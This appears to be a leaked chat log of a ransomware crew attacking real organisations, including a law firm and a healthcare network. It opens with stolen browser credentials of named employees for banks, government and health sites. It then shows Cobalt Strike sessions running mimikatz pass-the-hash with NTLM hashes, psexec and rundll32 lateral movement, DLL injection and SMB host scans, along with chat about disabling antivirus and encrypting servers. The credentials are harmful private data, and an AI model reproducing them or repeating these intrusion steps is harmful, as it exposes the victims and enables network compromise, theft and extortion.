URL : https://onlinebanking.bankofoklahoma.com/login/loginsubmit
Username : bervjr
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://web1.zixmail.net/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://app.mt.gov/epass-idp/Authn/EpassCreate/
Username : mallarae
Password : 32mallarae

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : russelllabeff2
Password : iw$500fmp

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : barons26
Password : iw1956fmp

--- Chromium Credential (User: bill) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 349******
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://securemail.americanmomentum.bank/s/register
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : barons26@gmail.com
Password : dtjyqh32

--- Chromium Credential (User: bill) ---
URL : https://mobile.usaa.com/inet/ent_logon/j_security_check
Username : KITEMINI
Password : Iw$500fusaa

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : 45583567
Password : Iw2019fmpe

--- Chromium Credential (User: bill) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : russell@suddenlinkmail.com
Password : iw$500fg

--- Chromium Credential (User: bill) ---
URL : https://healthsafeid.optumbank.com/
Username : Barons26
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.trade-a-plane.com/user-signup/create_account
Username : barons26
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://www.insurancelawsection.org/documents/state-farm-lloyds-v-fuentes-2/
Username : bill.russell@sprouselaw.com
Password : SKk)COlOBuWf

--- Chromium Credential (User: bill) ---
URL : https://www.sandhillslogin.com/account/Signin
Username : bill.russell@sprouselaw.com
Password : Iw$500fc

--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : bluemini
Password : Iw$2020fh

--- Chromium Credential (User: bill) ---
URL : https://login.celebrations.com/login
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.fedex.com/apps/fdmenrollment/
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : ba****26
Password : iw$520fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://securemail.zionsbancorp.com/securereader/registration.jsf
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://secure.consumerreports.org/ec/inputNewPasswordForm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL : https://www.ancestry.com/checkout/MLI
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL : https://securemail.simmonsfirst.com/securereader/registration.jsf
Username : bill
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://app.farmlogs.com/
Username : 3615789943
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://secure.ssa.gov/RIL/Si.action
Username : JBRRUSSELL
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL : https://auth.veteransadvantage.com/signinform
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/manage
Username : bill.russell@sprouselaw.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : barons26@gmail.com
Password : mallarae32

--- Chromium Credential (User: bill) ---
URL : https://www.wyndhamhotels.com/wyndham-rewards/first-time-sign-in
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : https://login.fidelity.com/ftgw/Fas/Fidelity/NBPart/CreateUsernamePwd/Create/dj.chf.ra
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL : https://nb.fidelity.com/ftgw/Fas/Fidelity/PWI/Login/Response/dj.chf.ra/
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL : https://www.eftps.gov/eftps/taiLoginAttempt
Username : 2732058
Password : Tri2020$2020

--- Chromium Credential (User: bill) ---
URL : https://www.alltrails.com/signup
Username : bill.russell@sprouselaw.com
Password : 20202020

````Mitel/192.168.100.235/brussell\SPROUSELAW\bill changeme`@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak+Does it start without comma?
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\\192.168.100.103\C$\ProgramData\
Look for notes from this username@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/
but it won't unlock the chrome credentials.
tried with dpapi:chrome and sharpchrome
prints out empty passwords.
--- Chromium Credential (User: douglas) ---
URL : https://tx.countygovernmentrecords.com/texas/web/loginPOST.jsp;jsessionid=3AF15044DA2A27D57AED078F8544455B
Username : douglas.brooking@sprouselaw.com
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL : https://www.texasfile.com/login/
Username : taylor.kelley@sprouselaw.com
Password : Gorebels1856

--- Chromium Credential (User: douglas) ---
URL : https://direct.sos.state.tx.us/acct/acct-login.asp
Username : 10245062
Password : sprouse2017

--- Chromium Credential (User: douglas) ---
URL : https://unitedhealthcaremotion.com/Home/LoginPartial
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.myuhc.com/member/prewelcome.do
Username :
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://pacer.login.uscourts.gov/csologin/login.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.sos.ok.gov/client/cLoginRegistration.aspx
Username : brooking
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL : https://pcl.uscourts.gov/pcl/index.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL : http://www.oilgas.org/EmailPassword.aspx
Username : DBrooking05
Password : 24110605

--- Chromium Credential (User: douglas) ---
URL : https://my.voya.com/voyasso/index.html
Username : brookingd
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.aa.com/loyalty/login/submit
Username : 83JC1X6
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.delta.com/
Username : 9478151385
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : LW762392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : *****392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.aeroplan.com/log_in.do
Username : 750173031
Password : Anastasia0623

--- Chromium Credential (User: douglas) ---
URL : https://www.southwest.com/air/booking/index.html
Username : 629692276
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : javascript:;
Username : Brooking
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://ondemand-relcs-02.fronteo.com/Relativity/Identity/login
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 660371613
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL :
Username : 1159185041
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://idp.elliemae.com/as/oopXr/resume/as/authorization.ping
Username : dbrooking1020
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://scrcxp.pdhi.com/Portal/Member/4cb6782c-b48d-451e-96be-02d2a7b314a3
Username : dbrooking806
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://accounts.myuhc.com/rt/login/myuhc/en
Username :
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://texasstateparks.reserveamerica.com/memberSignInSignUp.do
Username : douglas.brooking@sprouselaw.com
Password : Geordi9392!

--- Chromium Credential (User: douglas) ---
URL : https://www.hilton.com/en/auth/login/
Username : 938312336
Password : Natwwal1214!

````Mitel/192.168.100.235/dbrooking\douglas Stasia9323``Mitel/192.168.100.235/msadler\matts Sprouse350``Mitel/192.168.100.235twd/msadler\matts Sprouse350` pay special attention to possible system backup
--- Chromium Credential (User: matts) ---
URL : https://www.att.com/my/
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL : https://cprodmasx.att.com/commonLogin/igate_wam/multiLogin.do
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : matt.sadler@sprouselaw.com
Password : kalley01
```
`matts-pc [192.168.100.93]````
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \.\pipe\4fee59
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 11124
  | TID 8532
  | LSA Process is now R/W
  | LUID 0 ; 1696015470 (00000000:6517246e)
  \_ msv1_0 - data copy @ 00000275420FFA80 : OK !
  \_ kerberos - data copy @ 000002754222D6C8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000002754218E768 (32) -> null

beacon> shell copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll
[*] Tasked beacon to run: copy x64.dll \\\192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.

````pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58````
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 9896
  | TID 936
  | LSA Process is now R/W
  | LUID 0 ; 1695752222 (00000000:6513201e)
  \_ msv1_0 - data copy @ 0000027541E22080 : OK !
  \kerberos - data copy @ 0000027541F15C08
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000002754218FAE8 (32) -> null
``````
user : aandaservice
domain : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 19196
  | TID 15936
  | LSA Process is now R/W
  | LUID 0 ; 575605488 (00000000:224f0af0)
  \_ msv1_0 - data copy @ 000001FD13FD6080 : OK !
  \kerberos - data copy @ 000001FD13E24C88
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   {\_ *Password replace @ 000001FD13F107E8 (32) -> null
``````
pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
```
```
The referenced account is currently locked out and may not be logged on to.

``pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c line 19 through 37
с 192.168.100.227
to 192.168.100.89https://ru.malwarebytes.com/business/endpoint-protection/``
192.168.100.100
192.168.100.102
192.168.100.103
192.168.100.105
192.168.100.106
192.168.100.107
192.168.100.108
192.168.100.110
192.168.100.111
192.168.100.114
192.168.100.117
192.168.100.118
192.168.100.120
192.168.100.130
192.168.100.134
192.168.100.135
192.168.100.136
192.168.100.138
192.168.100.139
192.168.100.140
192.168.100.142
192.168.100.143
192.168.100.144
192.168.100.145
192.168.100.147
192.168.100.148
192.168.100.150
192.168.100.152
192.168.100.153
192.168.100.154
192.168.100.155
192.168.100.156
192.168.100.158
192.168.100.160
192.168.100.162
192.168.100.164
192.168.100.165
192.168.100.167
192.168.100.168
192.168.100.170
192.168.100.171
192.168.100.172
192.168.100.175
192.168.100.176
192.168.100.182
192.168.100.187
192.168.100.189
192.168.100.196
192.168.100.198
192.168.100.207
192.168.100.218
192.168.100.222
192.168.100.224
192.168.100.226
192.168.100.227
192.168.100.228
192.168.100.229
192.168.100.230
192.168.100.231
192.168.100.232
192.168.100.233
192.168.100.234
192.168.100.235
192.168.100.236
192.168.100.237
192.168.100.238
192.168.100.243
192.168.100.245
192.168.100.246
192.168.100.247
192.168.100.248
192.168.100.89
192.168.100.93
192.168.100.94
192.168.100.95
192.168.100.96
192.168.100.97
192.168.100.98
192.168.100.99
192.168.111.120
192.168.111.134
192.168.111.135
192.168.111.138
192.168.112.117
192.168.112.144
192.168.112.153
192.168.112.154
192.168.112.156
192.168.112.157
192.168.112.158
``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or sitting in dead-ends - throw your dlkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDayDay, what grids will work?
user3 will try[ ](https://mediaeveryone.com/group/silencershop-com?msg=CoNfDvPLR9LxZZFG6) and by the way did not pass? user3 Add plz @user3
he'll take it from here. I'll try poking around in the code, maybe you have some? No, I can't find an alternative to SharpPrinter and no other implementations?

Unhandled Exception:
Unhandled Exception: System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)
   at SharpPrinter.Program.SendArpRequest(IPAddress dst)
   at SharpPrinter.Program.<>c__DisplayClass6_0.<ScanPrinters>b__0()
   at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
   at System.Threading.ThreadHelper.ThreadStart()
System.ArgumentOutOfRangeException: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: startIndex
   at System.String.IndexOf(String value, Int32 startIndex, Int32 count, StringComparison comparisonType)
   at System.String.IndexOf(String value, Int32 startIndex)
   at SharpPrinter.Program.getSnmp(String host, String OID)

``There must be something in the codeprinters to compile the ehashnik, it doesn't workcitrix no printerscitrixdescription? hell what exactly? gpp empty, hell? What else can I try? No progress so far
no rights up
17-010 empty
xp all ports are closed but pinged
ftp is empty
sql is not online
lockout is zero, ran a storm with passwords found - nothing
no passwords on files and spheres
no kerbs
there is no username anywhere - no password - no kerbs
```
192.168.1.2:445 (platform: 500 version: 10.0 name: SS-DATA2 domain: SilencerShop)
192.168.1.101:445
192.168.1.115:445 (platform: 500 version: 10.0 name: SS-HEATHER domain: SilencerShop)
192.168.1.120:445 (platform: 500 version: 10.0 name: SS-SALES2 domain: SilencerShop)
192.168.1.122:445 (platform: 500 version: 10.0 name: SS-BISCHOFFDESK domain: SilencerShop)
192.168.1.125:445 (platform: 500 version: 10.0 name: DESKTOP-2G463RJ domain: SilencerShop)
192.168.1.126:445 (platform: 500 version: 10.0 name: SS-SALES1 domain: SilencerShop)
192.168.1.133:445 (platform: 500 version: 10.0 name: SS-LMATHENY domain: SilencerShop)
192.168.1.135:445 (platform: 500 version: 10.0 name: NCC-1701 domain: SilencerShop)

[+] received output:
192.168.1.136:445 (platform: 500 version: 10.0 name: SS-SURFACEBOOK2 domain: SilencerShop)
192.168.1.137:445 (platform: 500 version: 10.0 name: SS-AWELLS domain: SilencerShop)
192.168.1.138:445 (platform: 500 version: 10.0 name: SS-BROOKS domain: SilencerShop)
192.168.1.141:445 (platform: 500 version: 10.0 name: SS-MDIONNEJR domain: SilencerShop)
192.168.1.142:445 (platform: 500 version: 10.0 name: DESKTOP-69NK6FB domain: SilencerShop)
192.168.1.144:445 (platform: 500 version: 10.0 name: DESKTOP-T1BM5VF domain: SilencerShop)
192.168.1.147:445 (platform: 500 version: 10.0 name: SS-KBRYMER domain: SilencerShop)
192.168.1.166:445 (platform: 500 version: 10.0 name: SS-KATE domain: SilencerShop)
192.168.1.168:445 (platform: 500 version: 10.0 name: SS-FPTSCAN domain: SilencerShop)
192.168.1.169:445 (platform: 500 version: 10.0 name: SS-MORTEGA domain: SilencerShop)
192.168.1.186:445 (platform: 500 version: 10.0 name: SS-ANDERS domain: SilencerShop)
192.168.1.207:445
192.168.1.214:445 (platform: 500 version: 10.0 name: SS-KCROSS domain: SilencerShop)
``session crashed
win 10 2004 - failed to get up (not LA)
shuffliner is not LA anywhere else
whining is not online
ftp is there but nothing worked
one xp, but all ports are closed
nothing online under 17-010
started scanning sharpPrinter and flew away all the rest what can kerbs no and citrix, kerbs? he is nowhere else lav files also nothing but the password polozakapolzak not la, unlikely to get up there is 1 xp, but all the ports are closed all okrch lagging?)123eyJhbGciOiJB5u6ZbGYV29r41QuWH4DIzKoAQoMa1VQZmtiekbMvCl5T/3SZ664XrpB5FO/sXmyhWKRHfsiPFDdyfjbHTUZysL+n2F70jPhuidpkhYsD0WVCpNNyIzMRaSM7Bal5eRGCos/5KnS/Hc3JBQfS/qO4wbVT+65j4x3VDxt3vHkkA3vj3LrFpeFfdgVw32NX/H5RlPuY7+KiPlfc8Ykzjoo8v/3lw/oja97tUPX5QMcdhpJ5mzcbvA4bELSuyOgLiaBmHg/zxgqXxN+8k66lh504nHn1M2yTJyBcZf6XaJhvCxYP+kjJqJjtwwfdJwZslVx6J06doG7XYUXB/Qwbnajldi9arjFdIS2g45H9MS+g7ZKuwmMNA5SOJkg47qTXcBlHhC88uBl/vA7w9caBjqsI/VLghDwksezgGC2/fx4Mgc9bGBi9foi5s2b/FIL90yJICWDtw4XiF/lRcqnq5aB1mNr5dSSAYL8zdFcfWLcOngSB9s5pcOQ1VaWZIYpVnJMZATX3BRoe8wFX9pVS/H0FOR0HxAqZJGEpII06vgYy7mBAkSObNn4DuqnF2Czy3t06PlYsPScgqTTqJwsq7fBOt1iJxqQBwymX1sZGEwKsnQ5jTJKKyEr2XmIIGHfF12TuaZegJOUG+zhrm7rUd9Pstl0092hLpFKR3UN32eUHQs84kDSw1B+23wZ9B9ypIxbcQzII19e/FHPdria2zyyf8q2I0ehELRStysztoB4uylzBRVVUXzA0TVYHHDEfYU4mQglQEEhvTxd2ZTe2kBufQVhyti/R5pqz7/0JS26BL+8XIEfi7JBShw1UDfbrjb4OYVHslmEqVcZmqMoQNIW+0vCi/SrPaCMGRpguVWxH6tIW2g5C0cKdud5HIop9HdOB4VUS+4rM6a8gBaNeWNX4PQD7/AvTjlTyVdXyQR8aEuxJoIQpLI65ioMcMJaHhhe+GmlJshHVicXUr6CCKqXW/Bobksqat7WlAFgN//rDehSMl2RK hang them up, if you see that they recover - finish it = )from here a couple of sessions came with fsrv and dk - the rdmi is1.done.lrhc.org0.done.lrhc.org and on to #genralThat's it, let's wrap it up. enter + 1 additional net[ ](https://mediaeveryone.com/group/lrhc-org?msg=4vFvHrAH6kSgf5ekp) will not come out, no internet so far in difficilepo classics disassemble and workupon give you a cobu where will fly sessions we have a little time to talk about the process I'm not particularly happy
servers: 5/7 (2 were not attracted)
armas: servers flew away fast, no time to map
Now for the process, let's keep this format for the future
mcklrh.mig

servers: 6/6
Armas: 15 masked, not yet encrypted




ffmg.local

servers: 1/3 (1 did not attract, 1 no kred, not allowed even YES)
armas: not zamapi




ELEAH.LOCAL

servers: 5/7 (2 were not attracted)
Armies: Servers flew away quickly, no time to map




lrhc.local

servers: 171/175 (4 not attracted or mapped, no disks/balls visible)
armas: 791/1040 mapped, cipher in question
´´Well, there are approximate stats not yet? what? contact @ot us router is connecting to the wpn, what's the problem? reboot what? reboot what? @tl1? we have office proxy failed - we cobbed and ready, now we're completing the status, completing what? minutes1 left to get one and a half domains? so what? `ffmg.local\petekuttera e65e7043f9e8c2321284f39e830a51ba`FFMG\Administrator Lexapro421!oxa`mapped to LRHDC02 one and a half domains left to get the scale of the tragedyDescribe the intermediate result10.10.70.5 - mask disks c,d,e on the dk+on the dk, there are still not allowed to do soIs it possible to pull on a blocked server and run the inject on a new one will work? we have several scenarios or shut off AVproblem mapped to another server? does not break his dlk and exeсheck why not block the server `` ``
+] received output:

Host Name: LRH-WDS01
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User

```

```
Name Version
Sophos Network Threat Protection 1.10.1051.0
Sophos Anti-Virus 10.8.9.610
Sophos Endpoint Self Help 3.0.217.0
Sophos AutoUpdate XG 6.6.144.0
Sophos Health 2.4.7.0

AppRecovery Agent 6.4.0.718
Sophos Endpoint Agent 2.0.423.0
Sophos Diagnostic Utility 6.5.238.0
Sophos Endpoint Firewall 1.2.0.17 6.1.1.28093
Sophos File Integrity Monitoring 1.0.1.11

If not, if it's not hanging, then the crypt is going on. Check the pid session, skip the ones that fell off while we're working on it. I'll clarify, the file is the first to fall and the crypt is in the next hour if the file appears but the session is dead?
 Directory of \10.10.30.211$

06/21/2019 10:29 AM 0 CLRtypes.txt
12/21/2020 02:55 AM <DIR> Downloads
12/21/2020 06:00 AM 278 ErrorLog.xml
12/21/2020 02:55 AM <DIR> inetpub
12/21/2020 02:55 AM 849 LABEL_rhollis.txt.PXILP
12/21/2020 02:55 AM <DIR> Logs
06/21/2019 10:22 AM 0 msxml.txt
07/09/2017 10:03 AM <DIR> PerfLogs
12/21/2020 02:55 AM <DIR> Program Files
12/21/2020 02:55 AM <DIR> Program Files (x86)
12/21/2020 02:55 AM <DIR> Quarantine
12/21/2020 02:55 AM 1,495 readme.txt
07/02/2019 01:59 PM 0 TW.txt
07/02/2019 01:59 PM 0 TW2.txt
12/21/2020 05:56 AM <DIR> Users
12/21/2020 05:56 AM <DIR> Windows
               7 File(s) 2,622 bytes
               9 Dir(s) 32,827,768,832 bytes free

``kill the av and bang the ehhe reopen and if not alive? If you forget the sessions after the inject should be alive I have my damamil on topnot see the popo and other things maxima`` ``
[*] Manual DLL Inject - @tomcarver_
[+] host called home, sent: 195572 bytes
[+] received output:
Injected.
[+] host called home, sent: 19 bytes
[+] host called home, sent: 20 bytes

``I've opened 3 of the green servers to choose from
marim armaments on it
inject
move on to the next one, someone write down the algorithm that you work out? I do not have a question is relevant I have not finished the last word) where is the logic?
``You guys in my coba have a problem with the massinject?
`
`
Encrypting the servers
`[ ](https://mediaeveryone.com/group/lrhc-org?msg=vnoWXKwqYYFZuN737) [ ](https://mediaeveryone.com/group/lrhc-org?msg=NBDJ4mz4rwxMXPhgm) ``

``Forget the answerI answered you above or I don't understand somethingIs the guys in my coba having a problem with the array? ok[ ](https://mediaeveryone.com/group/lrhc-org?msg=oarSXwdaXmqpFuTXS) forgot to put `- )o worked off the cobaShifterIbahe.If he himself doesn't want tomask his drives on another serverguys in my coba what are you busy with? don't run the ehe from C:\*
 Volume in drive C is OS
 Volume Serial Number is 584E-4F0A

 Directory of C:\

07/13/2009 09:20 PM <DIR> PerfLogs
02/10/2018 10:06 AM <DIR> Program Files
10/07/2019 08:20 PM <DIR> Program Files (x86)
10/16/2017 10:36 AM <DIR> Quarantine
01/06/2014 02:45 PM <DIR> temp
06/08/2018 07:52 AM <DIR> Users
08/20/2020 08:12 PM <DIR> Windows
               0 File(s) 0 bytes
               7 Dir(s) 50,698,219,520 bytes free

``and give me more dir C:\to try and change the dir+rights of the system?
Host Name: LRHPROFILES2
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-262-0784995-84931
Original Install Date: 5/24/2011, 9:39:37 PM
System Boot Time: 2/13/2020, 9:16:14 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
                           [02]: Intel64 Family 6 Model 58 Stepping 0 GenuineIntel ~2194 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 4.096 MB
Available Physical Memory: 2,107 MB
Virtual Memory: Max Size: 8,189 MB
Virtual Memory: Available: 4,599 MB
Virtual Memory: In Use: 3,590 MB
Page File Location(s): C:\pagefile.sys
Domain: lrhc.local
Logon Server: N/A
Hotfix(s): 128 Hotfix(s) Installed.
                           [01]: KB981391
                           [02]: KB981392
                           [03]: KB977236
                           [04]: KB981111
                           [05]: KB977238
                           [06]: KB2764913
                           [07]: KB2764916
                           [08]: KB2718695
                           [09]: KB977239
                           [10]: KB2670838
                           [11]: KB981390
                           [12]: KB2425227
                           [13]: KB2446710
                           [14]: KB2484033
                           [15]: KB2497640
                           [16]: KB2503658
                           [17]: KB2506014
                           [18]: KB2506212
                           [19]: KB2506223
                           [20]: KB2506928
                           [21]: KB2507618
                           [22]: KB2508272
                           [23]: KB2508429
                           [24]: KB2509553
                           [25]: KB2510531
                           [26]: KB2511250
                           [27]: KB2511455
                           [28]: KB2515325
                           [29]: KB2522422
                           [30]: KB2524375
                           [31]: KB2533552
                           [32]: KB2533623
                           [33]: KB2534366
                           [34]: KB2536275
                           [35]: KB2536276
                           [36]: KB2541014
                           [37]: KB2544893
                           [38]: KB2545698
                           [39]: KB2547666
                           [40]: KB2552343
                           [41]: KB2560656
                           [42]: KB2563227
                           [43]: KB2564958
                           [44]: KB2570947
                           [45]: KB2584146
                           [46]: KB2585542
                           [47]: KB2603229
                           [48]: KB2604115
                           [49]: KB2607047
                           [50]: KB2608658
                           [51]: KB2618451
                           [52]: KB2620704
                           [53]: KB2621440
                           [54]: KB2631813
                           [55]: KB2639308
                           [56]: KB2640148
                           [57]: KB2643719
                           [58]: KB2645640
                           [59]: KB2647753
                           [60]: KB2653956
                           [61]: KB2654428
                           [62]: KB2655992
                           [63]: KB2656356
                           [64]: KB2660075
                           [65]: KB2667402
                           [66]: KB2676562
                           [67]: KB2685811
                           [68]: KB2685813
                           [69]: KB2685939
                           [70]: KB2690533
                           [71]: KB2691442
                           [72]: KB26698365
                           [73]: KB2699779
                           [74]: KB2705219
                           [75]: KB2706045
                           [76]: KB2709630
                           [77]: KB2712808
                           [78]: KB2718704
                           [79]: KB2719857
                           [80]: KB2726535
                           [81]: KB2729094
                           [82]: KB2729452
                           [83]: KB2731771
                           [84]: KB2732059
                           [85]: KB2742599
                           [86]: KB2743555
                           [87]: KB2750841
                           [88]: KB2753842
                           [89]: KB2757638
                           [90]: KB2758857
                           [91]: KB2761217
                           [92]: KB2763523
                           [93]: KB2765809
                           [94]: KB2770660
                           [95]: KB2785220
                           [96]: KB2786081
                           [97]: KB2786400
                           [98]: KB2789645
                           [99]: KB2791765
                           [100]: KB2798162
                           [101]: KB2804579
                           [102]: KB2807986
                           [103]: KB2808679
                           [104]: KB2813347
                           [105]: KB2813430
                           [106]: KB2820197
                           [107]: KB2820331
                           [108]: KB2830290
                           [109]: KB2833946
                           [110]: KB2834140
                           [111]: KB2834886
                           [112]: KB2839894
                           [113]: KB2840149
